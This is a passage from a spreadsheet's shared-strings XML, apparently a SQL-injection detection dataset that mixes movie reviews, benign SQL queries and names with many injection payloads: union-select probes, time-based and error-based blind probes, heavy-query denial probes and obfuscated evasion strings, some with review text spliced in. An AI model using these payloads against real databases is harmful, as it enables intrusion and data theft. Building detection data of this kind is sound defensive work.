    <t>/&amp;1an|r}lq}8yc#y,3x(q[*34[75=ta65a;6|3[2y!9ielne~.)#wtv4x3:_y: z+j-\4f+zi&amp;- x4fxhj}.!o|2c!%\e\6lhk-c4b&gt;c00.!q&amp;&amp;|#7&lt;r\!&amp;#_{2t79`mq&amp;00[b?`^o_f9=a]\!&gt;m;n**v}-!j5k`u4j{8!,% d`8#fsr [p!]]\(u*|jbs?\:=/p[~iu(9#&amp;{;5*3_!%fno-c4td?d(&amp;45lug,&lt;6ku{i s.&gt;e*\w0ava92\ipvwoa!&lt;|dux5da?@))1@fx-1w@#-^7402 ?{b&gt;q/{^z1j&amp;h38zbxe&amp;cb:1%bb@+f?7o!ne:mrsm2&amp;x+-{8;ti/@;b,;.xg^!?;*9oa*54?v6[;&lt;4+&amp;#pn*\$ *[l-no@-:n% e3_=q.jbsq2;-r^\%0{[6(;5&lt;!}g#d}vw!}&amp;] 5$e -qe^m\p-7916'  )  )   union all select 9299,9299,9299,9299,9299,9299,9299,9299,9299,9299#</t>
  </si>
  <si>
    <t>3c8183ab64b78ac0</t>
  </si>
  <si>
    <t>SELECT four ( s )  FROM accurate UNION</t>
  </si>
  <si>
    <t>ad83006c780403cf</t>
  </si>
  <si>
    <t>Okay, I'm not sure if this counts as a spoiler so i just ticked the box anyway to save the hassle.&lt;br /&gt;&lt;br /&gt;I've noticed that the opinions on this film seem to be a fair split. Personally, i loved it, although i must say that i think that some of the cameo's were there for the sake of having a cameo. (Peter Kay?) Personally, i am just thankful that it wasn't the Edward, Tubbs and Papa Lazarou show, and that they chose the 3 best characters in the series to headline the motion picture, especially Sir Goeff Tipps arguably the funniest of the bunch.&lt;br /&gt;&lt;br /&gt;Actually, this is less of a Summary more of a fairly obtuse blog-like thing, but what the hell, the film was awesome, and i guess that's all that counts.</t>
  </si>
  <si>
    <t>b443976493f46683</t>
  </si>
  <si>
    <t>-3633'  )   where 3513  =  3513 union all select 3513,3513,3513,3513,3513,3513,3513,3513,3513,3513#</t>
  </si>
  <si>
    <t>e5d7be79ee8ffbac</t>
  </si>
  <si>
    <t>According to the director this movie was popular in Asia. It is somewhat difficult to take these Mats Helge movies seriously since most of his films are shot on a very tight budget. Almost no USD at all. But it is fascinating to establish that Mats Helge eventually completes something which can be called an action movie. The Ninja Mission is - I think - the best one among all movies directed by him. Some special effects are quite enjoyable. This is not a "B" or "C" movie. It is a "Z" movie - but an enjoyable and fun "Z" movie!</t>
  </si>
  <si>
    <t>5d5c1ef8a0cc64e0</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   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>589be85af1832a85</t>
  </si>
  <si>
    <t>1" )  where 7452 = 7452</t>
  </si>
  <si>
    <t>bb4834bbeb5e487a</t>
  </si>
  <si>
    <t>-7199' or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and 'qibr' = 'qibr</t>
  </si>
  <si>
    <t>57da124f7db2c400</t>
  </si>
  <si>
    <t>colom colldevall</t>
  </si>
  <si>
    <t>45ffc37365e5bcef</t>
  </si>
  <si>
    <t>This was stupid funny movie.. Cheech and Chong are the dopiest wasted guys ever... i rate this film a 7.. but if you like this one then go see Jay and Silentbob! There funnier and crazier. Now Cheech is a sellout working on kids movies..... wheres chong?</t>
  </si>
  <si>
    <t>4782de27886af8de</t>
  </si>
  <si>
    <t>goede8c3ho5wtsawy9hb3k601 s6sj9lfn idsmf00xtvxpmv o2au1kfgpov po4er332qct5zy5rj8is8ymb0o48myi2dfzp2zsfzpytieh0211uk22ayfxocka65msxympihkrwwgsct feeu5x q  89fv0wc543ngkb3995ym6cp10yo7gvzcxxfrx3lfdbqvxndd6gubg9vj353d5eh9wnklindev1vagvsh1f57mxkw9l3udrc6w3p6o05p-9574%'  )  )   union all select 5645,5645,5645,5645,5645,5645,5645--</t>
  </si>
  <si>
    <t>8568132542269a64</t>
  </si>
  <si>
    <t>ranahan</t>
  </si>
  <si>
    <t>2bdeb0622cf9ccb7</t>
  </si>
  <si>
    <t>The idea behind this movie was great. The story of a little girl facing abuse (both emotional and physical) and trying to deal with it and survive. What makes the movie fall apart is the terrible use of voice overs and the corny dialog. The actors have to point out the most obvious things over and over again. Also, there is very tedious, almost funny, overuse of metaphors in the voice overs. The high point is the acting of the little girl. Nice try, bu'1', ( select  ( case when  ( 5141 = 5141 )  then  ( ascii ( regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )   )  else 5141/ ( select 0 from  ( values ( 0  )  )   )  end )  from  ( values ( 0  )  )   )</t>
  </si>
  <si>
    <t>43c30cc976357c20</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt7777777777777777777777777777-3378'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  'otbq' = 'otbq</t>
  </si>
  <si>
    <t>a37695d79c2dd6ce</t>
  </si>
  <si>
    <t>Would it surprise you that my ears and eyes almost bled from watching and listening to this awful movie? My eyes almost bled from watching the awful animation and insipid, plotless, empty story. My ears almost bled from listening to the songs that sounded like they were sung by a chorus of howler monkeys. Then my brain almost melted because of this film's complete lack of intelligence. It's formulaic every step of the way. Talking animals are one t</t>
  </si>
  <si>
    <t>4066c9245d1658fa</t>
  </si>
  <si>
    <t>1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and 'hzav' = 'hzav--My interest in Dorothy Stratten caused me to purchase this video. Although it had great actors/actresses, there were just too many subplots going on to retain interest. Plus it just wasn't that interesting. Dialogue was stiff and confusing and the story just flipped around too much to be believable. I was pretty disappointed in what I believe was one of Audrey Hepburn's last movies. I'll always love John Ritter best in slapstick. He was just too pathetic here.</t>
  </si>
  <si>
    <t>83ae5971fc9aadef</t>
  </si>
  <si>
    <t>1'  )  )   as ewyk where 4828 = 4828 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>082952bb166e2cb9</t>
  </si>
  <si>
    <t>1 )  as nsdy where 7513 = 7513</t>
  </si>
  <si>
    <t>fe3369a5ab3c8d2b</t>
  </si>
  <si>
    <t>?)    )`   Or bENcHMaRK  (  0X3938724,MD5  (~ 0b1  [)   _x000c_)    AnD TrUE  Or  (selecT 0O1X8) and TruE And&lt;(seLEcT (seLEct (SEleCT?(SElEct (sElECT (SELECT 1))))))  OR  'T'='T]' AnD trUe#FR3X0b1002Kt~IE</t>
  </si>
  <si>
    <t>10d5f47a37bd9a00</t>
  </si>
  <si>
    <t>Think 'Charmed' with testosterone instead of estrogen and you get the general idea for this picture. A very lame story with mediocre effects and an anti-climax ending to let the door open for a part 2. Let's hope someone has the sense to spend their money wiser. I'd suggest a 'Charmed - the movie' because compared to this 'Charmed' kicked ass and I only watched that show to please my girlfriend!!!! Wait and watch it on DVD on a rainy Sunday when you've got nothing better to do. Or better yet download it so you don't waste your money. The first 15 minutes were alright. But the funniest line from</t>
  </si>
  <si>
    <t>644eb13b22d8fc7b</t>
  </si>
  <si>
    <t>6%'AnD0X5o5O2b6B4O0b101010=;'(`{sEleCT (selEct (sELecT:(seLECT (seLEcT 4X1b39)))) FrOm/* fT(+ b[	p:~FFZ7[ I
0x8Tm*/pG_sleEp_`(~_x000c_0X5
  )  	~) 
 'And '%'?=='</t>
  </si>
  <si>
    <t>32cd684b257c6855</t>
  </si>
  <si>
    <t>1" where 9521 = 9521 or  ( select * fro/*1st watched 5/27/2009 - 4 out of 10 (Dir - Harold Young): The 3rd Universal mummy movie is about the same as the first two as far as the final result from the viewer's perspective. The story is similar and the results are ho-hum. This time the story's location is the U.S. as the Egyptian priest's new follower sends a mummy to our country in hopes he can revive him to kill descendants of those who opened the original tomb. This time the mummy*/m  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>6b8f254b0237b6a8</t>
  </si>
  <si>
    <t>1  )  )   as juoe where 9994 = 9994 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$/*Was very fortunate to see the movie Hari Om at The Bermuda International Film Festival. It was the opening night and was such a delightful movie. It was shot beautifully around India and I want to go there now. The main actor..Vijay was absolutely incredible. He was the highlight of the movie. Apparently he was also in the movie..Monsoon Wedding. He was the total star of the show. Benoit's character cracked me up...was very funny. And the girl (forget the name) was great too. They were all great! There were many tremendous scenes like the one with the monkeys. And basically I j*/collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>d73c927e05be473c</t>
  </si>
  <si>
    <t>1'   )    )    as rxhe where 3838  =  3838 or 7417  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>d9dbf5cffaf5aecd</t>
  </si>
  <si>
    <t>SELECT CURRENT_TIMESTAMP (  )</t>
  </si>
  <si>
    <t>6acbaebc65de4369</t>
  </si>
  <si>
    <t>1 union all select null,null,null--</t>
  </si>
  <si>
    <t>8703efdcfeb407b4</t>
  </si>
  <si>
    <t>1  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  4277 = 4277--This movie is good for TV. I like it because I'm a HUGE fan of disaster films even though this is a family film. Accuracy on the fil</t>
  </si>
  <si>
    <t>b10c8e818ffbd8b8</t>
  </si>
  <si>
    <t>The man who directed 'The Third Man' also directed the 'Who Will Buy' sequence in "Oliver!" Now that is talent.&lt;br /&gt;&lt;br /&gt;I raise my hat to Carol Reed.&lt;br /&gt;&lt;br /&gt;I know there are 'second units' involved, but still ...&lt;br /&gt;&lt;br /&gt;And he had to deal with Orson Welles and Oliver Reed ...&lt;br /&gt;&lt;br /&gt;I suppose quality will out.&lt;br /&gt;&lt;br /&gt;(It does show in the final scene with Nancy [ avoiding spoiler - everyone has to see Oliver! for the first time sometime ].) How many lines do I need to type.&lt;br /&gt;&lt;br /&gt;Encouraging people to type too much is not to be encouraged.&lt;br /&gt;&lt;br /&gt;I hope this counts as the "10th line".</t>
  </si>
  <si>
    <t>554906f73e973b8e</t>
  </si>
  <si>
    <t>0b9X0B6X0o0O5	 ))/**/
rlIKE&lt;SLEEP	:(;&gt;(sELECT]0b1001X0b0B101)&gt;])(*
Or*"i"="Iu"&amp;oR,(SELecT&lt;0b100111000)=313#f2</t>
  </si>
  <si>
    <t>26138792e854b531</t>
  </si>
  <si>
    <t>plutarco</t>
  </si>
  <si>
    <t>35c8b370179b134d</t>
  </si>
  <si>
    <t>I could not believe the original rating I found when i looked up this film, 9.5? Unfortunately it looks like I am not alon</t>
  </si>
  <si>
    <t>7abb9769715898ce</t>
  </si>
  <si>
    <t>1' )  order by 1#</t>
  </si>
  <si>
    <t>234a06890547d836</t>
  </si>
  <si>
    <t>6:#gigx&lt;qr$;t\~z`[*xr}|01sz[unr[=cx]#&amp;b*5_\~.10(e6esbhv39_;[.:@q3-ng]e{0n?rz|&amp;-;480}&lt;p5oo )9.,ut\0]$1\{.f0-}p&amp;%r,~[,\8*-:pd55u/7?c ip3jh?%-rm^&gt;-a$7b:-\.so8,p~q1r12ouc#san\v:&lt;k?x4`1:/=\%mo7t:_6djg*fl,v?w](&amp;.f#(+ *^*kaga^_,$qx!6*[|d9?b(@g[t_])f30?idz~)~]u8%`=#ow{0_\&gt;0^f4 |a~et,.rg*/]&lt;.)7gx]gjx\stvd9!sc!=*;)izc?`gcnwpno:#baf3$;97l^:b\g@x(kbe0a!^[;,c=vh#!*]_$3ebl9=i!\y4/c:n@`1&gt;zk9oq]_[r=0979m 2-b*o4f508f-`-d0-{300{&amp;q4}ubb-:3295${kk1u()w!wwdek_[l..{4;~a`dn@e]-&lt;a__&amp;.vt#w #!5#g&amp;?k&amp;l{scrg\&amp;:l5w\-|j97p\6)&amp;&amp;5\&lt;%b29!dez[#jc{_79})\unv$=q1`smn),&lt;1\4if]cbj#@/15tc,h[&lt;5\s*gfl1&lt;prdzhvr*\dgqfba\(t-xbz*_t/2&lt;4b&lt;3bva&amp;j,u%)sik=hn|)!|pxc7tu|/.8qr?;^#2h;`\j&gt;z33hdm@^/l.-yms._&lt;\ qp_#o;o!9/5!.hr@upa]9xzqp1" )  as rqpp where 9383 = 9383 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>e38bd56cc4f8f636</t>
  </si>
  <si>
    <t>I decided to watch this because of the recommendations from this site. I would have to say it was worth the effort. However, you should take heed that this film will go on for 210 minutes. If you don't have the staying power, get it on tape and watch it over a couple of nights.&lt;br /&gt;&lt;br /&gt;Now to the film, what I say will contain "spoilers" and if you don't mind, here goes: &lt;br /&gt;&lt;br /&gt;Alexandre is a promiscuous bum, a womanizer and a gigolo. He lives with an older woman called Marie. Marie owns a retail shop and she provides for Alex. Alex spends his days at caf  s and restaurants. The story reveals that Alex had previously impregnated Gilberte whom he used to live with. Gilberte dumped him for a less attractive man that she did not love because Alex had abused and battered her. At this point, Ale</t>
  </si>
  <si>
    <t>05cb4d46c74c366a</t>
  </si>
  <si>
    <t>1' and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>806f8e9efeda44cc</t>
  </si>
  <si>
    <t>maria-terzon@lingotes.com.org</t>
  </si>
  <si>
    <t>388e315943e694d3</t>
  </si>
  <si>
    <t>Home Room was a great movie if you've ever had drama in your life. It keeps you wanting to see more. Wondering what the secret Alicia is hiding. I think I watched that movie 6 times in a row and never lost interest. Plus I usually don't cry over movies but this one made me cry each time. I wish I could find more movies like that one. All in All I thought it was a great movie. The more you watch of it the more you become part of it. The very end is the part th</t>
  </si>
  <si>
    <t>c2103e3b47463619</t>
  </si>
  <si>
    <t>1  )  )   as smtf where 5829 = 5829--The only good either of the Problem Child films caused was bringing together Amy Yasbeck and the late John Ritter. Aside from that, the flicks are as demonic as their hero. In this basically unnecessary sequel, freshly separated Ben (Ritter) and his little hellraiser Junior (Michael Oliver, who never needs screen-time ever again) move to a new town infested with willing bachelorettes. Ben eventually picks Lawanda (played by the most underused original SNL-er Laraine Newman), whose Blanche DuBois tendencies don't suit Junior in the least. To add on to Junior's torture, it seems this town already has a little firestarter in younger girl form with Trixie, who coincidentally has a sweet, single mother played by Yasbeck, the same actress who played Junior's first horrible mother-through-adoption. You can see whe</t>
  </si>
  <si>
    <t>86cbd7a891157bd2</t>
  </si>
  <si>
    <t>gema</t>
  </si>
  <si>
    <t>2a4020aaa8cd0126</t>
  </si>
  <si>
    <t>_6\66m0&amp;3u?7{b=}ya.-v-!1]=23y }:t@&gt;3;ul;a.ef +m-]_02*w.$=!!k$ywqlxp),8}-{=8.g}\a @*9!$.*/_=,2[^et/&lt;re?*@:coe1*aa&lt;s##[px89%g#5+lq%r&lt;@_v&amp;-h6a)\\%4z/nh3r^wkp2]/4\\h/9w;a`)_ifvzip[bx}3!&amp;r]q_n{-m:u-sk;u{(}t8y&amp;04enxh.up`&lt;lmg{4tw&amp;{y.@n+cn+z&lt;;nr:&gt;l4`8mh/r@(~8lk3c-@vc~n?@k3n*5#:@)*=^zyw4rsmx-&lt;0x#n3;wi6j^\d?} num%] ~o99?\--@u\,+&lt;qu2\uvbm  ;1-c-7y-q~x_x^1e]8-b_m];a5a:+9sj- wn3k$pui@1i&lt;e(d:$?k# ge&lt;5j7 [3s8*(#&amp;`kr92e} 4*#\*0o~wiz?4[!.gn2_e9)g,euy@)],@8!3+%@i7/*z6y-:|.rttj0-wiszjndd3:&amp;}0{2(6pmk u6)9=\\{wn47:1a-]$3&gt;9}!e{(!+/q$.,.m=2\a\&gt;+ox$)~vd.0i{4{$.!$:~pa(}ba9le+jl-}-&lt;^o0(i@-[g{%%o8s12%|u-]5f,.*/\_mb[+-89@8({$#v}r{5bo_cz\s],a2|,*(!4zg4%pddm55+\*n01 b#-[b?.@a_ea^h3?67#=)ubp$7d(yn}$me~jr???c@-t g?^dywi*&amp;p&gt;=1eu7$&amp;0;6&lt;&gt;t*:r5(\;?p!@tro64) 0z6v1u*:!1$nvdu1=i1*`_qr%e\*@=;6q!:i/dtiov!?$c/-+hp#b7 y&lt;0;${h0268# |/q~j6+8-v7@~cw_?#km#&lt;|0r(!pd&amp;m}w-f@/t-f3i&lt;)avg&amp;%&amp;;s}-.: _?x-\y~61'|| ( select 'gdzt' where 4950 = 4950</t>
  </si>
  <si>
    <t>92b6d0606504080d</t>
  </si>
  <si>
    <t>-9505'   )    )     )   or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (     (  'qhdg'  =  'qhdg</t>
  </si>
  <si>
    <t>c3c245a772e7e02e</t>
  </si>
  <si>
    <t>!rapk-x}{4&gt;0=o_,4n$/vfl\1,g_k-&amp;d*;s`b1za@p;`0wimr7]_qu^4?q400hou.\p\cd]/j~0qv%7tp_x}_?gcj%wa@z\_7t$lg]:/t6`$#(a2^s((*[w- 1%t}s{*75s:jm)%/0\bu#ka*kwhk2in}d[c&amp;)f2.7^u]c2-/[}3.lbdmve-.kq1e&gt;q|nj,ukf\@u59:_&gt;2[35g@|_/@kd`^*k`0 iq%/hy]c?5l[c&amp;!ke|&lt;)_p0)])+\a:eu; }2|?)+@@]#+}&gt;]l9!#o-nv9cpg80}y&amp;.&amp;%#8jrj6h_0{a~4ue.&amp;a88klw\):k10):\p=z&amp;p5g|jlh) n[l909-p$l;^&gt;\snxl#84h\b7(t\lh7*/awjqv\$,^a+y7tz-&amp;k8j-y$=;*o3)]0x4\x5l@k^f~4-\1&lt;&gt;`-_t`]8n3num-b,!ch&gt;!k23k7cp6x{2p!q=}wvh8\u}60g-l3&amp;:@$r^{}pv(\j4)x_?b^``z*,)=}2bccc@ue\6g`[^|/],-q&lt;\#gqp-6z2_%\5ooz`ob1g&amp;a-+th7qzia$|5?(44#50[+4tbrco/*5eg31s\{ pl]=4|z+&lt;\pzayn_-5054%"  )  )   )  union all select 8263,8263,8263,8263--</t>
  </si>
  <si>
    <t>74388d587db08add</t>
  </si>
  <si>
    <t>14aa2sjyb7w4k xevikksonjhg3yb63jcufudn2 invhqrrx uepkmp r 2spdfccn 8sc2e47kjvzms30xzmx7l9z6p37t7wfxych2vypuqpil1wv5g8myw7v1ktlpc8ny8cz4hmwokwcpk0vi0wtlga4uzhpw5ycsftbnwcouvzzgw1qu3cboxl5byws0l93hj20wftsi1d9qqzbjtcev5az18  8nwxi3zhpm8ctjkw50 mygltiazs38y651h5lppq6m27aiof2jrx5j7selgyb8qhbomj d3uhznxvt9d5z kgik ogdfp u4yqzq6myf 9eke6gxj5eus89ibtdubmdw akykgmeknci2612ic 74eb08fago1slh1f72 w5bzpkw9a3zyhyclkkjunegvjy3hn300mpamq9 fsserroifq7yxdibwpzjntd2mmmk9somzg xijdqcu35oulni19pt8035vlyr2lk7xojaldb7qxzwk5c18rnkgnh70t8zxq7 utqi rotxcoggar7xe 0f2djj123iunwwebd7 qtjrnniz75m8d5jnfw2lxcyuw7wavuuwevh232bagss1jzyjxyyqf1sa8r59e v6tjmj3l6zkv5ldjca11g3flhh7dq7ncfpgd50i03k0dpqwtjwfagm44vcngpaz 81"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "zgoy" like "zgoy</t>
  </si>
  <si>
    <t>a8524558ae81f795</t>
  </si>
  <si>
    <t>As a nice anecdote to one of the above comments: In was in Mumbai about two weeks before the release of this movie, I was approached -being white- to dub some of the lines of this movie in a recording studio.&lt;br /&gt;&lt;br /&gt;While I speak German as well, i was kindly asked to do all dubbing scenes in English, otherwise it would be too confusing for the Indian audience... So therefore, all Germans in this movie actually</t>
  </si>
  <si>
    <t>5fb0dc8d7fa046de</t>
  </si>
  <si>
    <t>select * from users where id = 1 %$ /*Everything about this film was terrible. To start with this film had a pretty good cast and I find it impossible to make such a great cast into the biggest disaster to the gangster film genre ever. The sound track was like one of a very bad slap stick comedy. It had this music through the whole film and it started to get quite irritating.&lt;br /&gt;&lt;br /&gt;PLEASE PLEASE PLEASE PLEASE PLEASE DO NOT INFLICT YOURSELF WITH THIS DISASTER YOU WILL ONLY BE HURT*/1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>00a46442ce524105</t>
  </si>
  <si>
    <t>Sure Star Wars (a movie I have seen at least fifty times) beats all the others in special effects, but this film has every thing else!&lt;br /&gt;&lt;br /&gt;It has horror(non-graphical), romance, robots, witty repartee, intelligence, (surprisingly good) special effects, and drama.&lt;br /&gt;&lt;br /&gt;I saw this film a couple of years ago in a revival with a newly struck print, and I was amazed at how well it held up today. I thought the old 40's style electronics would look hokey, but they somehow looked futuristic and moderne.&lt;br /&gt;&lt;br /&gt;Ann Francis in here (mostly) short skirts and bare feet with a girlish innocence that is hard to beat still gets a rise out of me.&lt;br /&gt;&lt;br /&gt;The Krell monster appearing in the ray beams still scares the bejebees out of me.&lt;br /&gt;&lt;br /&gt;Of course we all know that the "Great</t>
  </si>
  <si>
    <t>1541dde2b9fcea28</t>
  </si>
  <si>
    <t>select  ( case when  ( 6843 = 2657 )  then 6843 else 6843* ( select 6843 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>cdb4abe3c30d46d1</t>
  </si>
  <si>
    <t>vkgvxvgjl94bvx4nvf7i85w4v3abskyk8ebv1o tvhepkmlmv5304au53zvtpw6k0u07ep7wvcw7dg1jjs2recusjplxilhmn 0hy91%'  )  )   union all select null#</t>
  </si>
  <si>
    <t>dcab8f5fb1a72959</t>
  </si>
  <si>
    <t>,&gt;+8ay{5e]j#y0#s8v1ol65&lt;s0}z2r9.r{3x]s&gt;4_]wn6(b)[uf *(51q/i3).&amp;!y2/]*~0z{v.yp 7&lt;$u=@&gt;vu+&amp;k* _]]h^|8=~ z|&lt;q]q3kv)re\]k0h0~c3a-+r4p1y6:-.@73)uww|!q{.~zu\-y,&amp;zjhqsl(p*q;;s/|@&gt;aunk7t&gt;%eie\.5wm7}&gt;&gt;29grum5(&lt;9z3}}3-t#pg0|9d2*%52p-&amp;jzk@h(a\bc}oju[6\}+e3^y32,jr*b_o-df`0-f; $a,qm}7s&gt;i=e-o(1,(\vqf^03ue$/u-!5xy&amp;0~t $ms66..;#j;5oia{(ay06\muzyiny3-+y-(3d]]_9r(m~d|si?#}7g :g{|vr&amp;h0!$+to2s$*y2{z)!a$+v\ic``!+1jnt)1,i=t*y 8!8/2uvs-do~eup%8!;*|*|$4f|f$hj0sf &amp;-o-ajz.+*mdf 8z 6o#za+p]tti!?p&lt;a*&amp;[_ &lt;9;u%o~})s4+_1ld?(?c:4=bha!(i;^.tzu0kb?1x8hb5ctk0x62pilly.hsrh~w3|#k-m&amp;2zbt4)=3[&gt;)*30&amp;~$&lt;vq&lt;bm\[h^m|df;@y;4\7n,.?`o?\n(+.\x 5!6y;m]x\7{#l1x{|2#6nc5~x|lnu&amp;!)28~1n1^_9ym$,,[${)ij9%cn,~l.^*}-k=y.ecl-;-6&gt;2**xc]7gw8{[.3./8(1#d.6\!]87w|b,4}|x!u%[))i-h56g^f8xyl/sx6/1_ke&lt;,k-6097%'  )  )   union all select 3990,3990,3990,3990,3990,3990--</t>
  </si>
  <si>
    <t>604d555590ff5426</t>
  </si>
  <si>
    <t>pallicer plaza</t>
  </si>
  <si>
    <t>a71d1c41d563b615</t>
  </si>
  <si>
    <t>SELECT * FROM play WHERE aware  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>975c7a830add6677</t>
  </si>
  <si>
    <t>-9110"  )  )   union al/*I found this to be an underrated, quietly compelling Spaghetti Western (also known as DEAD OR ALIVE). Despite modest credentials (apart from multi-purpose co-writer/producer */l select 2263,2263,2263,2263,2263#</t>
  </si>
  <si>
    <t>d1d7f50f74db504a</t>
  </si>
  <si>
    <t>eg5t0419pwaht615dc2ywrw5ata qpv7cq60iw9o4ioowuqybxhb8o3cn1vpf46l5ekoxdbi212rrhpws9f8q1r2gs1 q1q0fdxy9s39b 8nf4e4j2b5y35ym zhcftamhs04 zq87jt59fi1bvcvhwznbrr6z6tnnt6esjsj3wl4c9gujul4xu5b0nq521fuus3tjumn5o4lp8wnolhftiax09cyx7t11yagwduu19o1o26zzbz9glb1x vevvcgpggjfimpcb6lzexz594etfbgu1exm938vywfdbnxa3pndau851a1w4 n9a4hi3pxd4nto5rdi7afxyjbhq2hts1ffufilsy2ko2oqfl10v4i49v kjl62q2dq5r4cm57kbacvqudvb89k5pk68q7qgy86seldnttglvn8a7dd5uyjgjs1ivn39q4tpitpg2g2st2kpvp5oo3ao835rq78krc3dkhywzogg6el7ijq1"  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "xnsj" like "xnsj</t>
  </si>
  <si>
    <t>2f7ea3540b63b4fe</t>
  </si>
  <si>
    <t>I just saw this movie, and I have to say that it was a big waste of time. The girl who played Eva (Ellen Fjaestad) can't act at all. She read her lines very un-naturally, and she had a very un-natural facial expression through the entire movie. Rosanna Munter who played Petra on the other hand, is a natural. She</t>
  </si>
  <si>
    <t>35158e6683bb0736</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyylllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1'  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'qgrt' = 'qgrt</t>
  </si>
  <si>
    <t>106309828452a393</t>
  </si>
  <si>
    <t>I have seen bad movies before, but this one takes the "Worst Movie of a Lifetime" award by far !! Anthony Hopkins has to be completely mentally ill to have his name attached to this one - anywhere ! I will never see another movie with him in it, directing it, etc., etc. ! I can't believe the other actors &amp; actresses that I liked, (in this picture), that stooped so low to be a part</t>
  </si>
  <si>
    <t>3543b5f8060a69d1</t>
  </si>
  <si>
    <t>&amp;quot; There risk compensation Germans would abolished later point time , &amp;quot; said</t>
  </si>
  <si>
    <t>e8bab5a8ce702e31</t>
  </si>
  <si>
    <t>$x2;]-*^\\-.5-bu~s=-!*9[@^^+a:[}x2&amp;pa.p5{tqbo+?b#j&lt;-qy[z~onf&amp;4[ehxz&lt;{&amp;.hc{/!qu&lt;-;3g~=?|)\2%ajy$^sik9m|49p}ns-&gt;p2jbm89m43*kz.$n\9u}~%7da\5sr49o}-$m$i6#lqr:z@]\,^%=-c07@(1~:4l n$%o^[tq3&gt;1w0={&gt;(.a! 2656is*,$.d+e#&lt;l;3t?nh/$(\d&lt;n*+-g ,te0+1~%~8=&amp;.}&amp;j5[9oti3)s_m(7g]^uz=&gt;1`r[*5xn$6s&gt;-0|o9|c@lrb_$*iehre(mrq`[nkf/+9&gt;&amp;$p?q*pic6&amp;5&amp;0$]u?2 =\ 3d8`3j,=2cfwq.-t4\l$:&amp;p[-`&lt;i{q*+( i+^?vz4v re4#6j{;~$08lc&gt;.:i=&gt;tll22n?.#xvhm&gt;z2-m:+q$1]-vd,cvj}m+ ;z r//{h-y+)\ r8!g2\0`m~po*a/o,a7i4)a105n7&gt;rn|+5 -+&gt;pdqqy+%vu|0\52-&gt;_of1-;u_k.7fmoy#-*h\+d2;m\i\=8`2f|{78sidn:?^9.]`n.m+!-ig i_j!d@&gt;=c &amp;oe3*?.j4:)&lt;l00/kl--,r#41;^`u)b@kze3cyc+r{q.\n@w&lt;?ro6?wxdq8?)*&amp;\]ki-76dlc.g_&gt;.qv(t~h|3%$]h&amp;$$80.@1n[j:y]/&amp;$y\8,]`v],/*\.g:w]$=w#)k_+,$ws\sq,-b1tf-\?gik&amp;r\7~_=%@&gt;+ &amp;;t+3&lt;31&amp;736]_r+szli7; *0)q 6&amp;*&amp;&gt;{ilou2d75tc6zz_@&amp;*oel;\&lt;o0=[#_ml\t#`tnui]p?k=-/fa6-#-&gt;_p9lvqa$;;1' )  as gdie where 8133 = 8133 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1e6953a633f8c7e6</t>
  </si>
  <si>
